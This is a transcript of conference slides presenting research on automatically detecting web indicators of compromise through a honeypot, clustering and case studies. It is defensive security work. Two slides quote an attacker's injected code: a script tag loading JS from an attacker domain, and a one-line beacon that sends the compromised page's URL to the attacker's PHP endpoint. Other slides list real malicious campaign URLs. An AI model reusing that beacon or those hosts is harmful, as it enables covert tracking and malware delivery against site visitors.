automatic extraction of indicators of compromise for web applications (ruhrsec 2016)

33
Automatic Extraction of Indicators of Compromise for Web Apps Dr.-Ing. Marco Balduzzi (with D. Balzarotti and O. Catakoglu @ WWW'16) 29 th April 2016 RuhrSec, Bochum

Upload: marco-balduzzi

Post on 15-Apr-2017

1.009 views

Category:

Internet


0 download

TRANSCRIPT

Page 1: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

Automatic Extraction of Indicators of Compromise for Web Apps

Dr.-Ing. Marco Balduzzi(with D. Balzarotti and O. Catakoglu @ WWW'16)

29th April 2016RuhrSec, Bochum

Page 2: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

2

Who am I?

Sr. Research Scientist @ Trend Micro

Forward-Looking Threat Research (FTR) team

M.Sc. + Ph.D.

UniBG + iSecLab@EURECOM

Hackish and open-source enthusiast since 2002

Established presence in international conferences and committees

Page 3: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

3

Indicators of Compromise (IOCs)

Used in incident response and computer forensics

Forensic artifacts

A system has been compromised or infected with malware

For example

Presence in Windows Registry

MD5 file in temporary directory

Unusual outbound network traffic

Log-in irregularities and failures

Page 4: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

4

Topic of presentation

Extend the concept of IOCs to Web Applications

(& automatically detect them!)

Page 5: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

5

Page 6: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

6

Page 7: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

7

Page 8: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

8

A simple observation

When compromising a web application, attackers often rely on external content / accessory scripts

Are not necessarily per se malicious

Popular Javascript libraries, e.g. jQuery

Beautifiers that control the look&feel of the page, e.g. matrix-style background

Scripts that implement reusable functions, e.g. browsers fingerprinting

Their innocuous form make them “highly resilient” to traditional detection systems (scanners)

Page 9: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

9

BUT…

Their presence can be used to precisely pinpoint compromised or harmful pages

(a Web Indicator of Compromise)

Page 10: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

10

Example: r57 hacking group

...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js> </SCRIPT>...

Page 11: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

11

Example: r57 hacking group

...<head><meta http-equiv="Content-Language" content="en-us"><meta http-equiv="Content-Type" content="text/html;charset=windows-1252"><title>4Ri3 60ndr0n9 was here </title><SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>...

a=new/**/Image();a.src='http://www.r57.gen.tr/r00t/yaz.php?a='+ escape(location.href);

Page 12: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

12

Page 13: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

13

How do we know that a script is used

in a malicious context ?

i.e. “Is a valid IOC”

Page 14: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

14

Data Collection

High-interaction web honeypot [1]

[1] Canali, D., and Balzarotti, D. Behind the scenes of online attacks: an analysis of exploitation behaviors on the web.

Page 15: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

15

Extraction of Candidates

Automatically extract candidates from files uploaded and modified by attackers

Focus on JavaScript URLs

Can be applied to other resource types

Normally benign!

E.g., Blocking mouse right-click. Used by attackers to prevent page inspection

Content agnostic (impossible to tell)

Need to extend the analysis to the context

Page 16: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

16

Searching the Web for Indicators

Public web pages including references to our indicators

Google did not help :(

Only indexes the content (intext:)

Meanpath.com

HTML/JS source-code support

Coverage of 200 million websites

Page 17: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

17

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Page 18: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

18

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Page 19: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

19

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Page 20: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

20

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

Page 21: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

21

Compromised vs. Benign

Verify that a candidate URL is a valid Indicator

Set of features:

Page Similarity

Maliciousness

Anomalous Origin

Component Popularity

Security Forums

Page 22: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

22

Experiments

Training data: Jan 2015 → April 2015

375 unique candidates (over a total of 2,765)

Population of 1 to 202 (manual vs automated attacks)

Clustering: unsupervised learning (k-means)

Weka framework

3 cluster categories: malicious, benign, undecided

Live experiment: May 2015 → August 2015 (4 months)

Automated detection via analysis framework

Page 23: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

23

Live Experiment

303 unique candidates (2.5/day)

Automatically processed and assigned to the closed cluster

22 Benign indicators

96 Malicious indicators

90% were previously unknown or misclassified

¼ IOCs → visual effects: moving text, snow

185 insufficient information (rare scripts)

Page 24: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

24

High Lifetime of Malicious Indicators

Page 25: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

25

Use of trustworthy code-repositories

10% IOCs hosted on Google Drive/Code!

1 was online for over 2 years!

Last month: used in dozens of defaced websites and drive-by

Page 26: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

26

Web Shells

Often deployed by attackers and hidden in defaced websites

Cases of password-protected logins [1]

Flagged as valid indicator

Cases of the r57shell script: feedback of defaced domains

[1] http://www.lionsclubmalviyanagar.com and http://www.wartisan.com

Page 27: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

27

Phishing

Common habit

Webmail portals of AOL and Yahoo

Reused the original JS files and hosted on the authoritative domain [1]

IOC included in pages hosted on different domains

Websites compromised by the same group [2]

Correctly classified as malicious indicator

[1] http://sns­static.aolcdn.com/sns.v14r8/js/fs.js [2] http://www.ucylojistik.com/ and http://fernandanunes.com/

Page 28: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

28

VisAdd Adware Campaign

http://4x3zy4ql­l8bu4n1j.netdna­ssl.com/res/helper.min.js

Installed on defaced webpages

TDS for affiliate programs

A.Visadd.com malware

Loads the same JS at client-side

600+ new infected users per day

Page 29: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

29

Fake Charity Program

http://static.donation­tools.org/widgets/FoxyLyrics/widget.js

Loaded via BHO in IE

Vittalia and BrowseFox malware

594 new infections per day

Page 30: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

30

Mailers

Compromised sites [1] → SPAM mailing server

Alternative to BHS and botnet-infected machines

Use of Pro Mailer V2: PHP mailer

Copies of jQuery hosted on Google and Tumblr

Unmodified copies of popular libraries. Very likely classified as benign by traditional scanners

Malicious use detected.

[1] http://www.senzadistanza.it/ and http://www.hprgroup.biz/

Page 31: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

31

Limitations

Our approach relies on the attacker's deployment strategy and is content agnostic

Evasion techniques:

Inline code

One-time generated URLs

Page 32: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

32

Conclusions

Introduced the concept of Web IOCs

Leveraged a honeypot for real-time identification

Benign content → undetected by traditional scanners

Use 'HTTP Referer' to discover compromises pages

By the same hacking group?

Page 33: Automatic Extraction of Indicators of Compromise for Web Applications (RuhrSec 2016)

33

Thank you!

Dr.-Ing. Marco Balduzzi

@embyte